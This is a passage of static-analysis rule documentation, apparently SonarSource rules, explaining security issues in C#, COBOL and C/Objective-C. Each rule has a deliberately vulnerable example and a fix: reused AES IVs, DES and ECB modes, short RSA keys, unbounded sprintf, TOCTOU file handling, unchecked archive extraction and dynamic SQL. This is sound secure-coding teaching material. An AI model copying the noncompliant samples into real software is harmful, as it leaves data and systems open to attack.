}

How does this work?

Windows authentication (integrated security)

When the connection string includes the Integrated Security=true parameter, it enables Windows authentication (sometimes called integrated security) for the database connection. With integrated security, the user’s Windows credentials are used to authenticate and authorize access to the database. It eliminates the need for a separate username and password for the database connection. Integrated security simplifies authentication and leverages the existing Windows authentication infrastructure for secure database access in your C# application.

It’s important to note that when using integrated security, the user running the application must have the necessary permissions to access the database. Ensure that the user account running the application has the appropriate privileges and is granted access to the database.

The syntax employed in connection strings varies by provider:

Syntax                       Supported by
Integrated Security=true;    SQL Server, Oracle, Postgres
Integrated Security=SSPI;    SQL Server, OLE DB
Integrated Security=yes;     MySQL
Trusted_Connection=true;     SQL Server
Trusted_Connection=yes;      ODBC

Note: Some providers such as MySQL do not support Windows authentication with .NET Core.

Pitfalls

Hard-coded passwords

It could be tempting to replace the empty password with a hard-coded one. Hard-coding passwords in the code can pose significant security risks. Here are a few reasons why it is not recommended:

  1. Security Vulnerability: Hard-coded passwords can be easily discovered by anyone who has access to the code, such as other developers or attackers. This can lead to unauthorized access to the database and potential data breaches.
  2. Lack of Flexibility: Hard-coded passwords make it difficult to change the password without modifying the code. If the password needs to be updated, it would require recompiling and redeploying the code, which can be time-consuming and error-prone.
  3. Version Control Issues: Storing passwords in code can lead to version control issues. If the code is shared or stored in a version control system, the password will be visible to anyone with access to the repository, which is a security risk.

To mitigate these risks, it is recommended to use secure methods for storing and retrieving passwords, such as using environment variables, configuration files, or secure key management systems. These methods allow for better security, flexibility, and separation of sensitive information from the codebase.
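The environment-variable approach can be sketched as follows. This is an illustrative example in JavaScript (in C#, the equivalent call is Environment.GetEnvironmentVariable); the DB_PASSWORD variable name and connection-string fields are assumptions, not part of the rule:

```javascript
// Sketch: assemble the connection string at runtime so that no password
// ever appears in the source code or the repository.
function buildConnectionString(env) {
  const password = env.DB_PASSWORD;
  if (!password) {
    // Fail fast instead of silently connecting with an empty password.
    throw new Error('DB_PASSWORD is not set');
  }
  return `Server=myServerAddress;Database=myDataBase;User Id=myUsername;Password=${password}`;
}

const conn = buildConnectionString({ DB_PASSWORD: 's3cret' });
console.log(conn.includes('Password=s3cret')); // true
```

In production, `env` would be `process.env`, populated by the deployment environment or a secret manager rather than by the codebase.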

Resources

Standards

csharpsquid:S3329

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In the mode Cipher Block Chaining (CBC), each block is used as cryptographic input for the next block. For this reason, the first block requires an initialization vector (IV), also called a "starting variable" (SV).

If the same IV is used for multiple encryption sessions or messages, each new encryption of the same plaintext input would always produce the same ciphertext output. This may allow an attacker to detect patterns in the ciphertext.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that the encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, a company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in .NET

Code examples

Noncompliant code example

using System.IO;
using System.Security.Cryptography;

public void Encrypt(byte[] key, byte[] dataToEncrypt, MemoryStream target)
{
    var aes = new AesCryptoServiceProvider();

    byte[] iv     = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
    var encryptor = aes.CreateEncryptor(key, iv); // Noncompliant

    var cryptoStream = new CryptoStream(target, encryptor, CryptoStreamMode.Write);
    var swEncrypt    = new StreamWriter(cryptoStream);

    swEncrypt.Write(dataToEncrypt);
}

Compliant solution

In this example, the code uses the IV generated by the AES provider itself (aes.IV), which comes from a random number generator that is considered cryptographically strong.

using System.IO;
using System.Security.Cryptography;

public void Encrypt(byte[] key, byte[] dataToEncrypt, MemoryStream target)
{
    var aes = new AesCryptoServiceProvider();

    var encryptor = aes.CreateEncryptor(key, aes.IV);

    var cryptoStream = new CryptoStream(target, encryptor, CryptoStreamMode.Write);
    var swEncrypt    = new StreamWriter(cryptoStream);

    swEncrypt.Write(dataToEncrypt);
}

How does this work?

Use unique IVs

To ensure high security, initialization vectors must meet two important criteria:

  • IVs must be unique for each encryption operation.
  • For CBC and CFB modes, a secure FIPS-compliant random number generator should be used to generate unpredictable IVs.

The IV does not need to be secret, so the IV or information sufficient to determine it may be transmitted along with the ciphertext.

In the previous non-compliant example, the problem is not that the IV is hard-coded.
It is that the same IV is used for multiple encryption attempts.

Resources

Standards

cobol:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers

WITH DEBUGGING MODE activates all debug lines (ones with 'D' or 'd' in the indicator area). This clause should not be used in production.

Sensitive Code Example

SOURCE-COMPUTER. IBM-370 WITH DEBUGGING MODE.

Compliant Solution

SOURCE-COMPUTER. IBM-370.

See

cobol:SQL.SelectWithNoWhereClauseCheck

Although the WHERE condition is optional in a SELECT statement, for performance and security reasons, a WHERE clause should always be specified to prevent reading the whole table.

Ask Yourself Whether

  • The whole table is not required.
  • The table contains sensitive information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Add a "WHERE" condition to "SELECT" statements.

Sensitive Code Example

SELECT * FROM db_persons INTO us_persons

Compliant Solution

SELECT * FROM db_persons INTO us_persons WHERE country IS 'US'

Exceptions

Not having a WHERE clause is acceptable in read-only cursors as results are generally sorted and it is possible to stop processing in the middle.

cobol:SQL.DynamicSqlCheck

It is a bad practice to use Dynamic SQL. It differs from static embedded SQL in that part or all of the actual SQL commands may be stored in a host variable that is built on the fly during execution of the program. In the extreme case, the SQL commands are generated in their entirety by the application program at run time. While dynamic SQL is more flexible than static embedded SQL, it does require additional overhead and is much more difficult to understand and to maintain.

Moreover, dynamic SQL may expose the application to SQL injection vulnerabilities.

This rule raises an issue when PREPARE or EXECUTE IMMEDIATE is used.
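The injection risk of building statements at run time can be illustrated outside COBOL. This is a hypothetical sketch in JavaScript; `buildQuery` stands in for any code that assembles SQL from a host variable:

```javascript
// Dynamic SQL: the statement text is assembled from user input at run time.
function buildQuery(country) {
  return `SELECT * FROM db_persons WHERE country = '${country}'`;
}

console.log(buildQuery('US'));
// SELECT * FROM db_persons WHERE country = 'US'

// Attacker-controlled input rewrites the statement and bypasses the filter:
console.log(buildQuery("US' OR '1'='1"));
// SELECT * FROM db_persons WHERE country = 'US' OR '1'='1'
```

Static embedded SQL (or, where dynamic SQL is unavoidable, parameter markers with host variables) keeps the statement structure fixed and closes this hole.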

Ask Yourself Whether

  • The SQL statement can be written without dynamic clauses.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Do not use dynamic clauses in "SELECT" statements.

Sensitive Code Example

EXEC SQL PREPARE SEL INTO :SQLDA FROM :STMTBUF END-EXEC.

Compliant Solution

EXEC SQL SELECT * FROM tableName END-EXEC.

See

cobol:S1686

Why is this an issue?

Defining a subprogram to be called at runtime is possible but ill-advised. This extremely powerful feature can easily be misused, and even when used correctly it greatly increases the overall complexity of the program and makes it impossible to know before runtime exactly what will be executed. It should therefore be avoided.

Noncompliant code example

MOVE SOMETHING TO MY_SUBPROG.
...
CALL MY_SUBPROG.

Compliant solution

01 MY_SUBPROG PIC X(10) VALUE "SUB123".
...
CALL MY_SUBPROG.

cobol:S1685

This rule is deprecated; use S4507 instead.

Why is this an issue?

Debug statements (ones with 'D' or 'd' in the indicator area) should not be executed in production, but the WITH DEBUGGING MODE clause activates all debug lines, which could expose sensitive information to attackers. Therefore the WITH DEBUGGING MODE clause should be removed.

Noncompliant code example

SOURCE-COMPUTER. IBM-370 WITH DEBUGGING MODE.

Compliant solution

SOURCE-COMPUTER. IBM-370.

Resources

cobol:COBOL.DisplayStatementUsageCheck

Why is this an issue?

The DISPLAY statement outputs data to standard out or some other destination and could reveal sensitive information. Therefore, it should be avoided.

Noncompliant code example

DISPLAY "hello world"  *> Noncompliant

Resources

objc:S5982

The purpose of changing the current working directory is to modify the base path used when the process resolves relative paths. When the working directory cannot be changed, the process keeps the previously defined directory as its active working directory. Verifying the success of chdir()-like functions is therefore important to prevent unintended relative path resolutions and unauthorized access.

Ask Yourself Whether

  • The success of changing the working directory is relevant for the application.
  • Changing the working directory is required by chroot to make the new root effective.
  • Subsequent disk operations are using relative paths.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

After changing the current working directory verify the success of the operation and handle errors.

Sensitive Code Example

The chdir operation could fail, leaving the process with access to unauthorized resources. The return code should be verified:

const char* any_dir = "/any/";
chdir(any_dir); // Sensitive: missing check of the return value

int fd = open(any_dir, O_RDONLY | O_DIRECTORY);
fchdir(fd); // Sensitive: missing check of the return value

Compliant Solution

Verify the return code of chdir and handle errors:

const char* root_dir = "/jail/";
if (chdir(root_dir) == -1) {
  exit(-1);
} // Compliant

int fd = open(root_dir, O_RDONLY | O_DIRECTORY);
if (fchdir(fd) == -1) {
  exit(-1);
} // Compliant

See

objc:S5832

Why is this an issue?

Pluggable authentication module (PAM) is a mechanism used on many unix variants to provide a unified way to authenticate users, independently of the underlying authentication scheme.

When authenticating users, it is strongly recommended to check the validity of the account (not locked, not expired, etc.); otherwise, it can lead to unauthorized access to resources.

Noncompliant code example

The account validity is not checked with pam_acct_mgmt when authenticating a user with pam_authenticate:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) { // Noncompliant - missing pam_acct_mgmt
        return -1;
    }

    return 0;
}

The return value of pam_acct_mgmt is not checked:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) {
        return -1;
    }
    pam_acct_mgmt(pamh, 0); // Noncompliant
    return 0;
}

Compliant solution

When authenticating a user with pam_authenticate, check the account validity with pam_acct_mgmt:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) {
        return -1;
    }
    if (pam_acct_mgmt(pamh, 0) != PAM_SUCCESS) { // Compliant
        return -1;
    }
    return 0;
}

Resources

objc:S5847

Why is this an issue?

"Time Of Check to Time Of Use" (TOCTOU) vulnerabilities occur when an application:

  • First, checks permissions or attributes of a file: for instance, is a file a symbolic link?
  • Next, performs some operations such as writing data to this file.

The application cannot assume that the state of the file is unchanged between these two steps: there is a race condition (i.e., two different processes can access and modify the same shared object/file at the same time), which can lead to privilege escalation, denial of service, and other unexpected results.

For instance, attackers can exploit this situation by creating a symbolic link to a sensitive file (e.g., /etc/passwd on Unix) right after the first step, and then try to elevate their privileges (e.g., if the written data has the correct /etc/passwd file format).

To avoid TOCTOU vulnerabilities, one possible solution is to do a single atomic operation for the "check" and "use" actions, therefore removing the race condition window. Another possibility is to use file descriptors. This way the binding of the file descriptor to the file cannot be changed by a concurrent process.

Noncompliant code example

A "check function" (access, stat, etc.; in this case access, to verify that a file does not exist) is followed by a "use function" (open, fopen, etc.) that writes data to the non-existent file. These two consecutive calls create a TOCTOU race condition:

#include <stdio.h>

void fopen_with_toctou(const char *file) {
  if (access(file, F_OK) == -1 && errno == ENOENT) {
    // the file doesn't exist
    // it is now created in order to write some data inside
    FILE *f = fopen(file, "w"); // Noncompliant: a race condition window exists between the access() call and the fopen() call
    if (NULL == f) {
      /* Handle error */
    }

    if (fclose(f) == EOF) {
      /* Handle error */
    }
  }
}

Compliant solution

If the file already exists on the disk, fopen with x mode will fail:

#include <stdio.h>

void open_without_toctou(const char *file) {
  FILE *f = fopen(file, "wx"); // Compliant
  if (NULL == f) {
    /* Handle error */
  }
  /* Write to file */
  if (fclose(f) == EOF) {
    /* Handle error */
  }
}

A more generic solution is to use "file descriptors":

void open_without_toctou(const char *file) {
  int fd = open(file, O_CREAT | O_EXCL | O_WRONLY, S_IRUSR | S_IWUSR); // mode argument is required with O_CREAT
  if (-1 != fd) {
    FILE *f = fdopen(fd, "w");  // Compliant
  }
}

Resources

objc:S5849

Setting capabilities can lead to privilege escalation.

Linux capabilities allow you to assign narrow slices of root's permissions to files or processes. A thread with capabilities bypasses the normal kernel security checks to execute high-privilege actions such as mounting a device to a directory, without requiring (additional) root privileges.

Ask Yourself Whether

Capabilities are granted:

  • To a process that does not require all capabilities to do its job.
  • To an untrusted process.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Capabilities are high privileges, traditionally associated with the superuser (root), so make sure that only the most restrictive and necessary capabilities are assigned to files and processes.

Sensitive Code Example

When setting capabilities:

cap_t caps = cap_init();
cap_value_t cap_list[2];
cap_list[0] = CAP_FOWNER;
cap_list[1] = CAP_CHOWN;
cap_set_flag(caps, CAP_PERMITTED, 2, cap_list, CAP_SET);

cap_set_file("file", caps); // Sensitive
cap_set_fd(fd, caps); // Sensitive
cap_set_proc(caps); // Sensitive
capsetp(pid, caps); // Sensitive
capset(hdrp, datap); // Sensitive: direct use of this system call is discouraged

When setting SUID/SGID attributes:

chmod("file", S_ISUID|S_ISGID); // Sensitive
fchmod(fd, S_ISUID|S_ISGID); // Sensitive

See

objc:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data that expands into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers compress irrelevant data (e.g., a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if it exceeds a predefined threshold. In particular, it is not recommended to recursively expand archives (an entry of an archive could itself be an archive).

Sensitive Code Example

#include <archive.h>
#include <archive_entry.h>
// ...

void f(const char *filename, int flags) {
  struct archive_entry *entry;
  struct archive *a = archive_read_new();
  struct archive *ext = archive_write_disk_new();
  archive_write_disk_set_options(ext, flags);
  archive_read_support_format_tar(a);

  if ((archive_read_open_filename(a, filename, 10240))) {
    return;
  }

  for (;;) {
    int r = archive_read_next_header(a, &entry);
    if (r == ARCHIVE_EOF) {
      break;
    }
    if (r != ARCHIVE_OK) {
      return;
    }
  }
  archive_read_close(a);
  archive_read_free(a);

  archive_write_close(ext);
  archive_write_free(ext);
}

Compliant Solution

#include <archive.h>
#include <archive_entry.h>
// ...

int f(const char *filename, int flags) {
  const int max_number_of_extracted_entries = 1000;
  const int64_t max_file_size = 1000000000; // 1 GB

  int number_of_extracted_entries = 0;
  int64_t total_file_size = 0;

  struct archive_entry *entry;
  struct archive *a = archive_read_new();
  struct archive *ext = archive_write_disk_new();
  archive_write_disk_set_options(ext, flags);
  archive_read_support_format_tar(a);
  int status = 0;

  if ((archive_read_open_filename(a, filename, 10240))) {
    return -1;
  }

  for (;;) {
    number_of_extracted_entries++;
    if (number_of_extracted_entries > max_number_of_extracted_entries) {
      status = 1;
      break;
    }

    int r = archive_read_next_header(a, &entry);
    if (r == ARCHIVE_EOF) {
      break;
    }
    if (r != ARCHIVE_OK) {
      status = -1;
      break;
    }

    int64_t file_size = archive_entry_size(entry); // 64-bit to avoid truncating large entries
    total_file_size += file_size;
    if (total_file_size > max_file_size) {
      status = 1;
      break;
    }
  }
  archive_read_close(a);
  archive_read_free(a);

  archive_write_close(ext);
  archive_write_free(ext);

  return status;
}

See

objc:S6069

When using sprintf, it’s up to the developer to make sure the size of the buffer to be written to is large enough to avoid buffer overflows. Buffer overflows can cause the program to crash at a minimum. At worst, a carefully crafted overflow can cause malicious code to be executed.

Ask Yourself Whether

  • the provided buffer is large enough for the result of any possible call to the sprintf function (including all possible format strings and all possible additional arguments).

There is a risk if you answered no to the above question.

Recommended Secure Coding Practices

There are fundamentally safer alternatives. snprintf is one of them. It takes the size of the buffer as an additional argument, preventing the function from overflowing the buffer.

  • Use snprintf instead of sprintf. The slight performance overhead can be afforded in a vast majority of projects.
  • Check the buffer size passed to snprintf.

If you are working in C++, other safe alternatives exist:

  • std::string should be the preferred type to store strings
  • You can format to a string using std::ostringstream
  • Since C++20, std::format is also available to format strings
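The alternatives above can be sketched in a few lines. This is an illustrative helper, not part of the rule; the function name and the "message: " prefix are assumptions:

```cpp
#include <sstream>
#include <string>

// A sketch of the C++ alternatives listed above: format into a growable
// std::ostringstream and return a std::string, so no fixed-size buffer
// can ever overflow.
std::string format_message(const std::string& message) {
    std::ostringstream out;        // grows as needed, no fixed-size buffer
    out << "message: " << message; // no overflow possible
    return out.str();              // std::string owns its storage
}
```

With C++20, `std::format("message: {}", message)` produces the same result more directly.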

Sensitive Code Example

sprintf(str, "%s", message);   // Sensitive: `str` buffer size is not checked and it is vulnerable to overflows

Compliant Solution

snprintf(str, sizeof(str), "%s", message); // Prevent overflows by enforcing a maximum size for `str` buffer

Exceptions

It is a very common and acceptable pattern to compute the required size of the buffer with a call to snprintf with the same arguments into an empty buffer (this writes nothing but returns the necessary size), then to call sprintf, as the bound check is no longer needed. Note that 1 needs to be added to the size reported by snprintf to account for the terminating null character.

size_t buflen = snprintf(0, 0, "%s", message);
char* buf = malloc(buflen + 1); // For the final 0
sprintf(buf, "%s", message);

See

objc:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Botan

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("DES/CBC/PKCS7", Botan::ENCRYPTION); // Noncompliant
}

Compliant solution

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/GCM", Botan::ENCRYPTION);
}

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Documentation

Standards

objc:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB (Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Botan

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/ECB", Botan::ENCRYPTION); // Noncompliant
}

Example with an asymmetric cipher, RSA:

#include <botan/rng.h>
#include <botan/auto_rng.h>
#include <botan/rsa.h>
#include <botan/pubkey.h>

void encrypt() {
  std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::AutoSeeded_RNG);
  Botan::RSA_PrivateKey                           rsaKey(*rng.get(), 2048);

  Botan::PK_Encryptor_EME(rsaKey, *rng.get(), "PKCS1v15"); // Noncompliant
}

Compliant solution

For the AES symmetric cipher, use the GCM mode:

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/GCM", Botan::ENCRYPTION);
}

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

#include <botan/rng.h>
#include <botan/auto_rng.h>
#include <botan/rsa.h>
#include <botan/pubkey.h>

void encrypt() {
  std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::AutoSeeded_RNG);
  Botan::RSA_PrivateKey                           rsaKey(*rng.get(), 2048);

  Botan::PK_Encryptor_EME(rsaKey, *rng.get(), "OAEP");
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Carter-Wegman + CTR
  • EAX: Encrypt-then-Authenticate-then-Translate
  • IAPM: Integrity Aware Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

objc:S5782

Why is this an issue?

Array overruns and buffer overflows happen when memory access accidentally goes beyond the boundary of the allocated array or buffer. These overreaching accesses cause some of the most damaging, and hard to track defects.

When the buffer overflow happens while reading a buffer, it can expose sensitive data that happens to be located next to the buffer in memory. When it happens while writing a buffer, it can be used to inject code or to wipe out sensitive memory.

This rule detects when a POSIX function takes one argument that is a buffer and another one that represents the size of the buffer, but the two arguments do not match.

Noncompliant code example

char array[10];
initialize(array);
void *pos = memchr(array, '@', 42); // Noncompliant, buffer overflow that could expose sensitive data

Compliant solution

char array[10];
initialize(array);
void *pos = memchr(array, '@', 10);

Exceptions

Functions related to sockets using the type socklen_t are not checked, because these functions rely on a C-style polymorphic pattern based on unions. This pattern involves a deliberate mismatch between allocated memory and the sizes of structures and would create false positives.

Resources

objc:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Botan

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

#include <botan/pubkey.h>
#include <botan/rng.h>
#include <botan/rsa.h>

void encrypt() {
    std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::System_RNG);
    Botan::RSA_PrivateKey                           rsaKey(*rng, 1024); // Noncompliant
}

Here is an example with the generation of a key as part of a Discrete Logarithmic (DL) group, a Digital Signature Algorithm (DSA) parameter:

#include <botan/dl_group.h>

void encrypt() {
    Botan::DL_Group("dsa/botan/1024"); // Noncompliant
}

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

#include <botan/ec_group.h>

void encrypt() {
    Botan::EC_Group("secp160k1"); // Noncompliant
}

Compliant solution

#include <botan/pubkey.h>
#include <botan/rng.h>
#include <botan/rsa.h>

void encrypt() {
    std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::System_RNG);
    Botan::RSA_PrivateKey                           rsaKey(*rng, 2048);
}
#include <botan/dl_group.h>

void encrypt() {
    Botan::DL_Group("dsa/botan/2048");
}
#include <botan/ec_group.h>

void encrypt() {
    Botan::EC_Group("secp224k1");
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of the keys generated with elliptic curve algorithms is indicated directly in their names. For example, secp256k1 generates a 256-bit private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterparts.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Learn more here.

Resources

Articles & blog posts

Standards

objc:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the functions rely on a pseudorandom number generator, they should not be used for security-critical applications or for protecting sensitive data.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

